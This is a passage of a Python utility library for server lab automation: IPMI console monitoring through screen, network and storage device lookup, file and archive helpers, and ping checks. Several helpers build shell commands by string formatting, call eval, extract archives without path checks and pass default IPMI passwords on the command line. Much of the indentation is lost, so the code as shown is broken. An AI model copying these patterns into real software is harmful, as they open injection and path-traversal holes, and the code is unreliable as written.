            return True,string.format(*tuple(inps)) + ' '+cmd
else:
return None,string+' '+cmd
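# Usage sketch for format_string() (illustrative comment only; the trailing space
# comes from the ' '+cmd suffix, where cmd is '' unless a {'base':...,'cmd':...}
# dict is passed as string):
#   format_string('ping -c %(count)s %(host)s',{'count':3,'host':'10.0.0.1'})
#       -> (True, 'ping -c 3 10.0.0.1 ')
#   format_string('ping -c %s %s',(3,'10.0.0.1'))
#       -> (True, 'ping -c 3 10.0.0.1 ')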
def format_string_dict(string):
if isinstance(string,dict):
string='''{}'''.format(string['base'])
    if '%(' in string or re.compile(r'{(\w.*)}').findall(string):
return True
return False
def Sort(src,reverse=False,func=None,order=None,field=None,base='key',sym=None):
    if isinstance(src,str) and sym is not None: src=src.split(sym)
    if isinstance(src,dict) and base == 'data':
        field=1
    def _cint_(e):
        try:
            if isinstance(field,int):
                if isinstance(e,(list,tuple)) and len(e) > field:
                    return int(e[field])
                else:
                    return 9999999
            return int(e)
        except:
            return e
    def _cstr_(e):
        if isinstance(field,int):
            if isinstance(e,(list,tuple)) and len(e) > field:
                return '''{}'''.format(e[field])
            else:
                return 'zzzzzzzzz'
        return '''{}'''.format(e)
    if isinstance(src,(list,tuple)):
        if order in [int,'int','digit','number']:
            return sorted(src,reverse=reverse,key=_cint_)
        elif order in [str,'str']:
            return sorted(src,reverse=reverse,key=_cstr_)
        else:
            if isinstance(field,int):
                return sorted(src,reverse=reverse,key=_cint_)
            return sorted(src,reverse=reverse,key=func)
    elif isinstance(src,dict):
        if base == 'key':
            lst=list(src.keys())
            if order in [int,'int','digit','number']:
                return sorted(lst,reverse=reverse,key=_cint_)
            elif order in [str,'str']:
                return sorted(lst,reverse=reverse,key=_cstr_)
            return sorted(lst,reverse=reverse,key=func)
        elif base in ['value','data']:
            # sort the items by their data, then return the keys in that order
            lst=list(src.items())
            if order in [int,'int','digit','number']:
                lst.sort(reverse=reverse,key=_cint_)
            elif order in [str,'str']:
                lst.sort(reverse=reverse,key=_cstr_)
            else:
                lst.sort(reverse=reverse,key=func)
            return [i[0] for i in lst]
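# Usage sketch for Sort() (illustrative comment only; returns a new sorted object
# rather than sorting in place):
#   Sort([('eth1',10),('eth0',2)],order='int',field=1) -> [('eth0',2),('eth1',10)]
#   Sort({'b':2,'a':1})                                -> ['a','b']   (sorted keys)
#   Sort({'a':2,'b':1},base='data',order='int')        -> ['b','a']   (keys ordered by value)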
def Update(src,*inps,**opts):
at=opts.pop('at',0)
err=opts.pop('err',False)
default=opts.pop('default',False)
force=opts.pop('force',False)
sym=opts.pop('sym',None)
if isinstance(src,(list,tuple,str)):
if isinstance(src,str) and sym: src=src.split(sym)
tuple_out=False
if isinstance(src,tuple) and force:
src=list(src)
tuple_out=True
n=len(src)
if n == 0:
if err is True:
return default
else:
src=list(inps)
elif isinstance(at,int) and n > at:
for i in range(0,len(inps)):
if n > at+i:
src[at+i]=inps[i]
elif err is True:
return default
else:
src=src+list(inps)[i:]
break
elif isinstance(at,(tuple,list)):
if len(inps) == len(at):
for i in range(0,len(at)):
if isinstance(at[i],int) and n > at[i]:
src[at[i]]=inps[i]
elif err is True:
return default
else:
src.append(inps[i])
if tuple_out: return tuple(src)
return src
elif isinstance(src,dict):
for ii in inps:
if isinstance(ii,dict):
src.update(ii)
if opts:
src.update(opts)
return src
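# Usage sketch for Update() (illustrative comment only):
#   Update([1,2,3],9,at=1)          -> [1,9,3]
#   Update((1,2),5,at=0,force=True) -> (5,2)   (force converts the tuple for editing)
#   Update({'a':1},{'b':2},c=3)     -> {'a':1,'b':2,'c':3}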
def Random(length=8,strs=None,mode='*',letter='*',default=1):
if mode in [int,'int','num','number']:
if isinstance(strs,(list,tuple)) and len(strs) == 2:
try:
s=int(strs[0])
n=int(strs[1])
return random.randint(s,n)
except:
pass
s=0
n=''
for i in range(0,length):
n=n+'9'
if n:
return random.randint(s,int(n))
return default
new=''
if not isinstance(strs,str) or not strs:
strs=''
if 'alpha' in mode or mode in ['all','*']:
if letter == 'upper':
strs=string.ascii_uppercase
elif letter == 'lower':
strs=string.ascii_lowercase
elif letter in ['*','all']:
strs=string.ascii_letters
if 'num' in mode or mode in ['all','*']:
strs=strs+string.digits
if 'char' in mode or 'sym' in mode or mode in ['all','*']:
strs=strs+string.punctuation
if not strs: strs=string.ascii_letters
strn=len(strs)-1
for i in range(0,length):
new='{0}{1}'.format(new,strs[random.randint(0,strn)])
return new
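# Usage sketch for Random() (illustrative comment only; output differs per call):
#   Random(length=6,mode='alphanum',letter='lower') -> e.g. 'k3v9ax'
#   Random(mode='int',strs=(1,10))                  -> a random integer from 1 to 10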
def Keys(src,find=None,start=None,end=None,sym='\n',default=[],word=False,pattern=False,findall=False,out=None):
rt=[]
    if isinstance(src,(str,list,tuple)) and find:
if isinstance(src,str): src=src.split(sym)
for row in range(0,len(src)):
for ff in FIND().Find(find,src=src[row],pattern=pattern,word=word,findall=findall,default=[],out=list):
if findall:
rt=rt+[(row,[m.start() for m in re.finditer(ff,src[row])])]
else:
                    idx=src[row].find(ff,start,end)
if idx >= 0:
rt.append((row,idx))
elif isinstance(src,dict):
if find is None:
if out in ['raw',None] and len(src.keys()) == 1 : return list(src.keys())[0]
if out in ['tuple',tuple]: return tuple(list(src.keys()))
return list(src.keys())
# if it has found need code for recurring search at each all data and path of keys
# return [ (keypath,[found data]), .... ]
#elif Type(src,'instance','classobj'):
# if src is instance or classobj then search in description and made function name at key
if rt:
if out in ['tuple',tuple]: return tuple(rt)
if out not in ['list',list] and len(rt) == 1 and rt[0][0] == 0:
if len(rt[0][1]) == 1:return rt[0][1][0]
return rt[0][1]
return rt
return default
class SCREEN:
def Kill(self,title):
ids=self.Id(title)
if len(ids) == 1:
rc=rshell('''screen -X -S {} quit'''.format(ids[0]))
if rc[0] == 0:
return True
return False
def Monitor(self,title,ip,ipmi_user,ipmi_pass,find=[],timeout=600):
if type(title) is not str or not title:
print('no title')
return False
scr_id=self.Id(title)
if scr_id:
print('Already has the title at {}'.format(scr_id))
return False
cmd="ipmitool -I lanplus -H {} -U {} -P {} sol activate".format(ip,ipmi_user,ipmi_pass)
# Linux OS Boot (Completely kernel loaded): find=['initrd0.img','\xff']
# PXE Boot prompt: find=['boot:']
# PXE initial : find=['PXE ']
# DHCP initial : find=['DHCP']
# ex: aa=screen_monitor('test','ipmitool -I lanplus -H <bmc ip> -U ADMIN -P ADMIN sol activate',find=['initrd0.img','\xff'],timeout=300)
log_file=self.Log(title,cmd)
init_time=TIME().Int()
if log_file:
mon_line=0
old_mon_line=-1
found=0
find_num=len(find)
cnt=0
while True:
if TIME().Int() - init_time > timeout :
print('Monitoring timeout({} sec)'.format(timeout))
if self.Kill(title):
os.unlink(log_file)
break
with open(log_file,'rb') as f:
tmp=f.read()
#tmp=_u_byte2str(tmp)
tmp=CONVERT(tmp).Str()
if '\x1b' in tmp:
tmp_a=tmp.split('\x1b')
elif '\r\n' in tmp:
tmp_a=tmp.split('\r\n')
elif '\r' in tmp:
tmp_a=tmp.split('\r')
else:
tmp_a=tmp.split('\n')
tmp_n=len(tmp_a)
for ss in tmp_a[tmp_n-2:]:
if 'SOL Session operational' in ss:
# control+c : "^C", Enter: "^M", any command "<linux command> ^M"
rshell('screen -S {} -p 0 -X stuff "^M"'.format(title))
cnt+=1
if cnt > 5:
                        print('SOL may not be activated, or the BMC has an issue')
if self.Kill(title):
os.unlink(log_file)
return False
continue
if find:
for ii in tmp_a[mon_line:]:
if find_num == 0:
print(ii)
else:
for ff in range(0,find_num):
find_i=find[found]
if ii.find(find_i) < 0:
break
found=found+1
if found >= find_num:
if self.Kill(title):
os.unlink(log_file)
return True
if tmp_n > 1:
mon_line=tmp_n -1
else:
mon_line=tmp_n
else:
if self.Kill(title):
os.unlink(log_file)
return True
TIME().Sleep(1)
return False
def Id(self,title=None):
scs=[]
rc=rshell('''screen -ls''')
if rc[0] == 1:
for ii in rc[1].split('\n')[1:]:
jj=ii.split()
if len(jj) == 2:
if title:
zz=jj[0].split('.')
if zz[1] == title:
scs.append(jj[0])
else:
scs.append(jj[0])
return scs
def Log(self,title,cmd):
# ipmitool -I lanplus -H 172.16.114.80 -U ADMIN -P ADMIN sol activate
pid=os.getpid()
tmp_file=FILE().MkTemp('/tmp/.slc.{}_{}.cfg'.format(title,pid))
log_file=FILE().MkTemp('/tmp/.screen_ck_{}_{}.log'.format(title,pid))
if os.path.isfile(log_file):
log_file=''
with open(tmp_file,'w') as f:
f.write('''logfile {}\nlogfile flush 0\nlog on\n'''.format(log_file))
if os.path.isfile(tmp_file):
rc=rshell('''screen -c {} -dmSL "{}" {}'''.format(tmp_file,title,cmd))
if rc[0] == 0:
for ii in range(0,50):
if os.path.isfile(log_file):
os.unlink(tmp_file)
return log_file
TIME().Sleep(0.1)
def findXML(xmlfile,find_name=None,find_path=None):
tree=ET.parse(xmlfile)
#root=ET.fromstring(data)
root=tree.getroot()
def find(tr,find_name):
for x in tr:
if x.attrib.get('name') == find_name:
return x,x.tag
rt,pp=find(x,find_name)
if rt:
return rt,'{}/{}'.format(x.tag,pp)
return None,None
found_root=None
if find_name:
found=find(root,find_name)
if found[0]:
found_root=found[0]
if find_path and isinstance(find_path,str):
#ex: root.findall('./Menu/Setting/[@name="Administrator Password"]/Information/HasPassword'):
if not found_root: found_root=root
return found_root.findall(find_path)
# <element>.tag: name, .text: data, .attrib: dict
def get_iso_uid(filename):
if type(filename) is not str:
return False,None,None
if os.path.exists(filename):
uid_cmd='''sudo /usr/sbin/blkid {}'''.format(filename)
rc=rshell(uid_cmd)
if rc[0] == 0:
uid_str='{0}_{1}'.format(findstr(rc[1],'UUID="(\w.*)" L')[0],findstr(rc[1],'LABEL="(\w.*)" T')[0]).replace(' ','_')
file_info=get_file(filename)
file_size=file_info.get('size',None)
return True,uid_str,file_size
return False,rc[1],None
return False,'{} not found'.format(filename),None
def git_ver(git_dir=None):
if git_dir is not None and os.path.isdir('{0}/.git'.format(git_dir)):
gver=rshell('''cd {0} && git describe --tags'''.format(git_dir))
if gver[0] == 0:
return gver[1]
def Compress(data,mode='lz4'):
if mode == 'lz4':
return frame.compress(data)
elif mode == 'bz2':
return bz2.compress(data)
def Decompress(data,mode='lz4',work_path='/tmp',del_org_file=False,file_info={}):
def FileName(filename):
if isinstance(filename,str):
filename_info=os.path.basename(filename).split('.')
if 'tar' in filename_info:
idx=filename_info.index('tar')
else:
idx=-1
return '.'.join(filename_info[:idx]),'.'.join(filename_info[idx:])
return None,None
def FileType(filename,default=False):
if not isinstance(filename,str) or not os.path.isfile(filename): return default
aa=magic.from_buffer(open(filename,'rb').read(2048))
if aa: return aa.split()[0].lower()
return 'unknown'
if mode == 'lz4':
return frame.decompress(data)
elif mode == 'bz2':
return bz2.BZ2Decompressor().decompress(data)
elif mode == 'file' and isinstance(data,str) and os.path.isfile(data):
        filename,fileext=FileName(data)
filetype=FileType(data)
if filetype and fileext:
# Tar stuff
if fileext in ['tgz','tar','tar.gz','tar.bz2','tar.xz'] and filetype in ['gzip','tar','bzip2','lzma','xz','bz2']:
tf=tarfile.open(data)
tf.extractall(work_path)
tf.close()
            elif fileext in ['zip'] and filetype in ['zip','compress']:
                with zipfile.ZipFile(data,'r') as zf:
                    zf.extractall(work_path)
            if del_org_file: os.unlink(data)
return True
def get_dev_mac(ifname):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        # SIOCGIFHWADDR (0x8927): query the interface hardware (MAC) address
        info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', _u_bytes(ifname[:15])))
        return ':'.join(['%02x' % (b if isinstance(b,int) else ord(b)) for b in info[18:24]])
    except:
        return
def get_net_device(name=None):
net_dev={}
net_dir='/sys/class/net'
if os.path.isdir(net_dir):
dirpath,dirnames,filenames = list(os.walk(net_dir))[0]
if name:
if name in dirnames:
drv=ls('{}/{}/device/driver/module/drivers'.format(dirpath,name))
if drv is False:
drv='unknown'
else:
drv=drv[0].split(':')[1]
net_dev[name]={
'mac':cat('{}/{}/address'.format(dirpath,name),no_end_newline=True),
'duplex':cat('{}/{}/duplex'.format(dirpath,name),no_end_newline=True),
'mtu':cat('{}/{}/mtu'.format(dirpath,name),no_end_newline=True),
'state':cat('{}/{}/operstate'.format(dirpath,name),no_end_newline=True),
'speed':cat('{}/{}/speed'.format(dirpath,name),no_end_newline=True),
'id':cat('{}/{}/ifindex'.format(dirpath,name),no_end_newline=True),
'driver':drv,
'drv_ver':cat('{}/{}/device/driver/module/version'.format(dirpath,name),no_end_newline=True),
}
else:
for dev in dirnames:
drv=ls('{}/{}/device/driver/module/drivers'.format(dirpath,dev))
if drv is False:
drv='unknown'
else:
drv=drv[0].split(':')[1]
net_dev[dev]={
'mac':cat('{}/{}/address'.format(dirpath,dev),no_end_newline=True),
'duplex':cat('{}/{}/duplex'.format(dirpath,dev),no_end_newline=True),
'mtu':cat('{}/{}/mtu'.format(dirpath,dev),no_end_newline=True),
'state':cat('{}/{}/operstate'.format(dirpath,dev),no_end_newline=True),
'speed':cat('{}/{}/speed'.format(dirpath,dev),no_end_newline=True),
'id':cat('{}/{}/ifindex'.format(dirpath,dev),no_end_newline=True),
'driver':drv,
'drv_ver':cat('{}/{}/device/driver/module/version'.format(dirpath,dev),no_end_newline=True),
}
return net_dev
else:
return False
def find_cdrom_dev(size=None):
load_kmod(['sr_mod','cdrom','libata','ata_piix','ata_generic','usb-storage'])
if os.path.isdir('/sys/block') is False:
return
for r, d, f in os.walk('/sys/block'):
for dd in d:
for rrr,ddd,fff in os.walk(os.path.join(r,dd)):
if 'removable' in fff:
with open('{0}/removable'.format(rrr),'r') as fp:
removable=fp.read()
if '1' in removable:
if os.path.isfile('{0}/device/model'.format(rrr)):
with open('{0}/device/model'.format(rrr),'r') as fpp:
model=fpp.read()
for ii in ['CDROM','DVD-ROM','DVD-RW']:
if ii in model:
if size is None:
return '/dev/{0}'.format(dd)
else:
if os.path.exists('{}/size'.format(rrr)):
with open('{}/size'.format(rrr),'r') as fss:
block_size=fss.read()
dev_size=int(block_size) * 512
if dev_size == int(size):
return '/dev/{0}'.format(dd)
def find_usb_dev(size=None,max_size=None):
rc=[]
load_kmod(modules=['usb-storage'])
if os.path.isdir('/sys/block') is False:
return
for r, d, f in os.walk('/sys/block'):
for dd in d:
for rrr,ddd,fff in os.walk(os.path.join(r,dd)):
if 'removable' in fff:
removable=cat('{0}/removable'.format(rrr))
if removable:
if '1' in removable:
if size is None:
if max_size:
file_size=cat('{0}/size'.format(rrr))
if file_size:
dev_size=int(file_size) * 512
if dev_size <= int(max_size):
rc.append('/dev/{0}'.format(dd))
else:
rc.append('/dev/{0}'.format(dd))
else:
file_size=cat('{0}/size'.format(rrr))
if file_size:
dev_size=int(file_size) * 512
if dev_size == int(size):
rc.append('/dev/{0}'.format(dd))
return rc
##########################################################################################
def append(src,addendum):
type_src=type(src)
type_data=type(addendum)
if src is None:
if type_data is str:
src=''
elif type_data is dict:
src={}
elif type_data is list:
src=[]
elif type_data is tuple:
src=()
type_src=type(src)
if addendum is None:
return src
if type_src == type_data:
        if type_src is dict:
            src.update(addendum)
            return src
elif type_src in [list,tuple]:
src=list(src)
for ii in addendum:
if ii not in src:
src.append(ii)
if type_src is tuple:
src=tuple(src)
return src
elif type_src is str:
return src+addendum
return False
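# Usage sketch for append() (illustrative comment only): merges two values of the
# same type, deduplicating list/tuple members; mismatched types return False.
#   append([1,2],[2,3])     -> [1,2,3]
#   append({'a':1},{'b':2}) -> {'a':1,'b':2}
#   append('ab','cd')       -> 'abcd'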
def compare(a,sym,b,ignore=None):
if type(a) is not int or type(b) is not int:
return False
if ignore is not None:
if eval('{} == {}'.format(a,ignore)) or eval('{} == {}'.format(b,ignore)):
return False
return eval('{} {} {}'.format(a,sym,b))
def integer(a,default=0):
try:
return int(a)
except:
return default
def Delete(*inps,**opts):
if len(inps) >= 2:
obj=inps[0]
keys=inps[1:]
elif len(inps) == 1:
obj=inps[0]
keys=opts.get('key',None)
if isinstance(keys,list):
keys=tuple(keys)
elif keys is not None:
keys=(keys,)
default=opts.get('default',None)
_type=opts.get('type','index')
if isinstance(obj,(list,tuple)):
nobj=len(obj)
rt=[]
if _type == 'index':
nkeys=Abs(*tuple(keys),obj=obj,out=list)
for i in range(0,len(obj)):
if i not in nkeys:
rt.append(obj[i])
else:
for i in obj:
if i not in keys:
rt.append(i)
return rt
elif isinstance(obj,dict):
if isinstance(keys,(list,tuple,dict)):
for key in keys:
obj.pop(key,default)
else:
obj.pop(keys,default)
return obj
elif isinstance(obj,str):
nkeys=[]
for i in keys:
if isinstance(i,(tuple,str,int)):
tt=Abs(i,obj=obj,out=list)
if tt:
nkeys=nkeys+tt
rt=''
for i in range(0,len(obj)):
if i in nkeys:
continue
rt=rt+obj[i]
return rt
return default
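# Usage sketch for Delete() (illustrative comment only; assumes the module's Abs()
# helper normalizes the given indexes against obj):
#   Delete([10,20,30],0,2)            -> [20]     (drop by index, the default)
#   Delete([10,20,30],20,type='data') -> [10,30]  (drop by value)
#   Delete({'a':1,'b':2},'a')         -> {'b':2}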
def get_data(data,key=None,ekey=None,default=None,method=None,strip=True,find=[],out_form=str):
if argtype(data,'Request'):
if key:
if method is None:
method=data.method
if method.upper() == 'GET':
rc=data.GET.get(key,default)
elif method == 'FILE':
if out_form is list:
rc=data.FILES.getlist(key,default)
else:
rc=data.FILES.get(key,default)
else:
if out_form is list:
rc=data.POST.getlist(key,default)
else:
rc=data.POST.get(key,default)
if argtype(rc,str) and strip:
rc=rc.strip()
if find and rc in find:
return True
if rc == 'true':
return True
elif rc == '':
return default
return rc
else:
if data.method == 'GET':
return data.GET
else:
return data.data
else:
type_data=type(data)
if type_data in [tuple,list]:
if len(data) > key:
if ekey and len(data) > ekey:
return data[key:ekey]
else:
return data[key]
elif type_data is dict:
return data.get(key,default)
return default
def check_value(src,find,idx=None):
'''Check key or value in the dict, list or tuple then True, not then False'''
if isinstance(src, (list,tuple,str,dict)):
if idx is None:
for i in src:
if IsSame(i,find): return True
else:
if isinstance(src,str):
if idx < 0:
if src[idx-len(find):idx] == find:
return True
else:
if src[idx:idx+len(find)] == find:
return True
else:
if Get(src,idx,out='raw') == find:
return True
return False
def ping(host,**opts):
count=opts.get('count',0)
interval=opts.get('interval',1)
keep_good=opts.get('keep_good',0)
timeout=opts.get('timeout',opts.get('timeout_sec',5))
lost_mon=opts.get('lost_mon',False)
log=opts.get('log',None)
stop_func=opts.get('stop_func',None)
log_format=opts.get('log_format','.')
cancel_func=opts.get('cancel_func',None)
return IP().Ping(host=host,count=count,interval=interval,keep_good=keep_good, timeout=timeout,lost_mon=lost_mon,log=log,stop_func=stop_func,log_format=log_format,cancel_func=cancel_func)
def is_lost(ip,**opts):
timeout=opts.get('timeout',opts.get('timeout_sec',1800))
interval=opts.get('interval',5)
stop_func=opts.get('stop_func',None)
cancel_func=opts.get('cancel_func',None)
log=opts.get('log',None)
init_time=None
if not ping(ip,count=3):
if not ping(ip,count=0,timeout=timeout,keep_good=30,interval=2,stop_func=stop_func,log=log,cancel_func=cancel_func):
return True,'Lost network'
return False,'OK'
def is_comeback(ip,**opts):
timeout=opts.get('timeout',opts.get('timeout_sec',1800))
interval=opts.get('interval',3)
keep=opts.get('keep',20)
stop_func=opts.get('stop_func',None)
cancel_func=opts.get('cancel_func',None)
log=opts.get('log',None)
init_time=None
run_time=TIME().Int()
if keep == 0 or keep is None:
return True,'N/A(Missing keep parameter data)'
if log:
log('[',direct=True,log_level=1)
time=TIME()
while True:
if time.Out(timeout):
if log:
log(']\n',direct=True,log_level=1)
return False,'Timeout monitor'
if is_cancel(cancel_func) or stop_func is True:
if log:
log(']\n',direct=True,log_level=1)
return True,'Stopped monitor by Custom'
if ping(ip,cancel_func=cancel_func):
if (TIME().Int() - run_time) > keep:
if log:
log(']\n',direct=True,log_level=1)
return True,'OK'
if log:
log('-',direct=True,log_level=1)
else:
run_time=TIME().Int()
if log:
log('.',direct=True,log_level=1)
TIME().Sleep(interval)
if log:
log(']\n',direct=True,log_level=1)
return False,'Timeout/Unknown issue'
def Join(*inps,symbol=''):
if len(inps) == 1 and isinstance(inps[0],(list,tuple)):
src=inps[0]
else:
src=inps
rt=''
for i in src:
if rt:
rt=rt+symbol+'{}'.format(i)
else:
rt='{}'.format(i)
return rt
def file_mode(val):
#return FILE().Mode(val)
if isinstance(val,int):
if val > 511:
return oct(val)[-4:]
elif val > 63:
return oct(val)
else:
val=_u_bytes2str(val)
if val:
cnt=len(val)
num=int(val)
if cnt >=3 and cnt <=4 and num >= 100 and num <= 777:
return int(val,8)
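# Usage sketch for file_mode() (illustrative comment only): converts between a
# numeric mode and its octal-string form for os.chmod().
#   file_mode('644')  -> 420      (int('644',8), ready to pass to os.chmod)
#   file_mode(0o4755) -> '4755'   (values above 511 keep the last four octal digits)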
def get_file(filename,**opts):
#return FILE(filename,**opts)
md5sum=opts.get('md5sum',False)
data=opts.get('data',False)
include_dir=opts.get('include_dir',False)
include_sub_dir=opts.get('include_sub_dir',False)
def get_file_data(filename,root_path=None):
rc={'name':os.path.basename(filename),'path':os.path.dirname(filename),'exist':False,'dir':False,'link':False}
if root_path:
in_filename=os.path.join(root_path,filename)
else:
in_filename=filename
if os.path.exists(in_filename):
fstat=os.stat(in_filename)
rc['uid']=fstat.st_uid
rc['gid']=fstat.st_gid
rc['size']=fstat.st_size
rc['atime']=fstat.st_atime
rc['mtime']=fstat.st_mtime
rc['ctime']=fstat.st_ctime
rc['inod']=fstat.st_ino
rc['mode']=oct(fstat.st_mode)[-4:]
rc['exist']=True
if os.path.islink(in_filename):
rc['link']=True
else:
rc['link']=False
if os.path.isdir(in_filename):
rc['dir']=True
rc['path']=in_filename
rc['name']=''
else:
rc['dir']=False
if md5sum or data:
with open(in_filename,'rb') as f:
fdata=f.read()
if md5sum:
rc['md5']=md5(fdata)
if data:
rc['data']=fdata
return rc
rc={'exist':False,'includes':[]}
if type(filename) is str:
rc.update(get_file_data(filename))
if rc['dir']:
root_path=filename
real_filename=None
else:
root_path=os.path.dirname(filename)
real_filename=os.path.basename(filename)
if include_dir:
pwd=os.getcwd()
os.chdir(root_path)
for dirPath, subDirs, fileList in os.walk('.'):
for sfile in fileList:
curFile=os.path.join(dirPath.replace('./',''),sfile)
if curFile != real_filename:
rc['includes'].append(get_file_data(curFile,root_path))
if include_sub_dir is False:
break
os.chdir(pwd)
return rc
def save_file(data,dest):
# return data.Extract(dest=dest,sub_dir=True)
if not isinstance(data,dict) or not isinstance(dest,str) : return False
if os.path.isdir(dest) is False: os.system('mkdir -p {0}'.format(dest))
if data.get('dir'):
fmode=file_mode(data.get('mode'))
if fmode:
os.chmod(dest,fmode)
else:
# if file then save
new_file=os.path.join(dest,data['name'])
if 'data' in data:
with open(new_file,'wb') as f:
f.write(data['data'])
chmod_mode=file_mode(data.get('mode'))
if chmod_mode:
os.chmod(new_file,chmod_mode)
if 'includes' in data and data['includes']: # If include directory or files
for ii in data['includes']:
if ii['path']:
sub_dir=os.path.join(dest,ii['path'])
else:
sub_dir='{}'.format(dest)
if os.path.isdir(sub_dir) is False: os.system('mkdir -p {}'.format(sub_dir))
sub_file=os.path.join(sub_dir,ii['name'])
with open(sub_file,'wb') as f:
f.write(ii['data'])
chmod_mode=file_mode(ii.get('mode'))
if chmod_mode:
os.chmod(sub_file,chmod_mode)
class ANSI:
ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
def Clean(self,data):
if data:
if isinstance(data,str):
return self.ansi_escape.sub('',data)
elif isinstance(data,list):
new_data=[]
for ii in data:
new_data.append(self.ansi_escape.sub('',ii))
return new_data
return data
def cat(filename,no_end_newline=False):
tmp=FILE().Rw(filename)
tmp=Get(tmp,1)
if isinstance(tmp,str) and no_end_newline:
tmp_a=tmp.split('\n')
ntmp=''
for ii in tmp_a[:-1]:
if ntmp:
ntmp='{}\n{}'.format(ntmp,ii)
else:
ntmp='{}'.format(ii)
if len(tmp_a[-1]) > 0:
ntmp='{}\n{}'.format(ntmp,tmp_a[-1])
tmp=ntmp
return tmp
def ls(dirname,opt=''):
if os.path.isdir(dirname):
dirlist=[]
dirinfo=list(os.walk(dirname))[0]
if opt == 'd':
dirlist=dirinfo[1]
elif opt == 'f':
dirlist=dirinfo[2]
else:
dirlist=dirinfo[1]+dirinfo[2]
return dirlist
return False
#########################################################################
def is_cancel(func):
if func:
ttt=type(func).__name__
if ttt in ['function','instancemethod','method']:
if func(): return True
elif ttt == 'bool':
if func : return True
return False
def log_file_info(name):
log_file_str=''
if name and len(name) > 0:
if type(name) is str:
if name.split(':')[0] == 'log_file':
return name
name=name.split(',')
for nn in name:
if nn and nn != 'None':
if log_file_str:
log_file_str='{}:{}'.format(log_file_str,nn)
else:
log_file_str='{}'.format(nn)
if log_file_str:
return 'log_file:{}'.format(log_file_str)
def error_exit(msg=None):
if msg is not None:
print(msg)
sys.exit(-1)
def std_err(msg,direct=False):
if direct:
sys.stderr.write(msg)
else:
sys.stderr.write('{}\n'.format(msg))
sys.stderr.flush()
def log_format(*msg,**opts):
log_date_format=opts.get('date_format','[%m/%d/%Y %H:%M:%S]')
func_name=opts.get('func_name',False)
log_intro=opts.get('log_intro',3)
end_new_line=opts.get('end_new_line','')
start_new_line=opts.get('start_new_line','\n')
if len(msg) > 0:
m_str=None
intro=''
intro_space=''
if log_date_format:
intro=TIME().Format(tformat=log_date_format)+' '
if func_name or log_intro > 3:
if type(func_name) is str:
intro=intro+'{0} '.format(func_name)
else:
intro=intro+'{0}() '.format(get_caller_fcuntion_name())
if intro:
for i in range(0,len(intro)+1):
intro_space=intro_space+' '
for m in list(msg):
if m_str is None:
m_str='{0}{1}{2}{3}'.format(start_new_line,intro,m,end_new_line)
else:
                m_str='{0}{1}{2}{3}{4}'.format(m_str,start_new_line,intro_space,m,end_new_line)
return m_str
def dget(dic=None,keys=None):
    if dic is None or keys is None:
        return False
    tmp=dic.copy()
for ii in keys.split('/'):
if ii in tmp:
dtmp=tmp[ii]
else:
return False
tmp=dtmp
return tmp
def dput(dic=None,keys=None,val=None,force=False,safe=True):
if dic is not None and keys:
tmp=dic
keys_arr=keys.split('/')
keys_num=len(keys_arr)
for ii in keys_arr[:(keys_num-1)]:
if ii in tmp:
if type(tmp[ii]) == type({}):
dtmp=tmp[ii]
else:
if tmp[ii] == None:
tmp[ii]={}
dtmp=tmp[ii]
else:
if force:
vtmp=tmp[ii]
tmp[ii]={vtmp:None}
dtmp=tmp[ii]
else:
return False
else:
if force:
tmp[ii]={}
dtmp=tmp[ii]
else:
return False
tmp=dtmp
if val == '_blank_':
val={}
if keys_arr[keys_num-1] in tmp.keys():
if safe:
if tmp[keys_arr[keys_num-1]]:
return False
tmp.update({keys_arr[keys_num-1]:val})
return True
else:
if force:
tmp.update({keys_arr[keys_num-1]:val})
return True
return False
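# Usage sketch for dget()/dput() (illustrative comment only): slash-separated key
# paths into nested dicts.
#   cfg={}
#   dput(cfg,'net/eth0/ip','10.0.0.2',force=True)  -> True
#   cfg                                            -> {'net':{'eth0':{'ip':'10.0.0.2'}}}
#   dget(cfg,'net/eth0/ip')                        -> '10.0.0.2'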
def sreplace(pattern,sub,string):
return re.sub('^%s' % pattern, sub, string)
def ereplace(pattern,sub,string):
return re.sub('%s$' % pattern, sub, string)
def md5(string):
return hashlib.md5(_u_bytes(string)).hexdigest()
def ipmi_cmd(cmd,ipmi_ip=None,ipmi_user='ADMIN',ipmi_pass='ADMIN',log=None):
if ipmi_ip is None:
ipmi_str=""" ipmitool {0} """.format(cmd)
else:
ipmi_str=""" ipmitool -I lanplus -H {0} -U {1} -P '{2}' {3} """.format(ipmi_ip,ipmi_user,ipmi_pass,cmd)
if log:
log(' ipmi_cmd():{}'.format(ipmi_str),log_level=7)
return rshell(ipmi_str)
def get_ipmi_mac(ipmi_ip=None,ipmi_user='ADMIN',ipmi_pass='ADMIN',loop=0):
ipmi_mac_str=None
if ipmi_ip is None:
ipmi_mac_str=""" ipmitool lan print 2>/dev/null | grep "MAC Address" | awk """
elif is_ipv4(ipmi_ip):
ipmi_mac_str=""" ipmitool -I lanplus -H {0} -U {1} -P {2} lan print 2>/dev/null | grep "MAC Address" | awk """.format(ipmi_ip,ipmi_user,ipmi_pass)
if ipmi_mac_str is not None:
ipmi_mac_str=ipmi_mac_str + """ '{print $4}' """
if not loop:
return rshell(ipmi_mac_str)
else:
for i in range(0,int(loop)):
mm=rshell(ipmi_mac_str)
if mm[1]:
return mm
time.sleep(3)
def get_ipmi_ip():
return rshell('''ipmitool lan print 2>/dev/null| grep "IP Address" | grep -v Source | awk '{print $4}' ''')
def get_host_name():
return socket.gethostname()
def get_host_ip(ifname=None,mac=None):
if ifname or mac:
if mac:
ifname=get_dev_name_from_mac(mac)
return get_net_dev_ip(ifname)
else:
ifname=get_default_route_dev()
if not ifname:
ifname=get_dev_name_from_mac()
if ifname:
ip=get_net_dev_ip(ifname)
if ip:
return ip
return socket.gethostbyname(socket.gethostname())
def get_default_route_dev():
#for ii in cat('/proc/net/route').split('\n'):
for ii in STR(cat('/proc/net/route')).Split('\n'):
ii_a=ii.split()
if len(ii_a) > 8 and '00000000' == ii_a[1] and '00000000' == ii_a[7]: return ii_a[0]
def get_dev_name_from_mac(mac=None):
if mac is None:
mac=get_host_mac()
net_dir='/sys/class/net'
if type(mac) is str and os.path.isdir(net_dir):
dirpath,dirnames,filenames = list(os.walk(net_dir))[0]
for dev in dirnames:
fmac=cat('{}/{}/address'.format(dirpath,dev),no_end_newline=True)
if type(fmac) is str and fmac.strip().lower() == mac.lower():
return dev
def get_host_iface():
if os.path.isfile('/proc/net/route'):
routes=cat('/proc/net/route')
        for ii in routes.split('\n'):
            ii_a=ii.split()
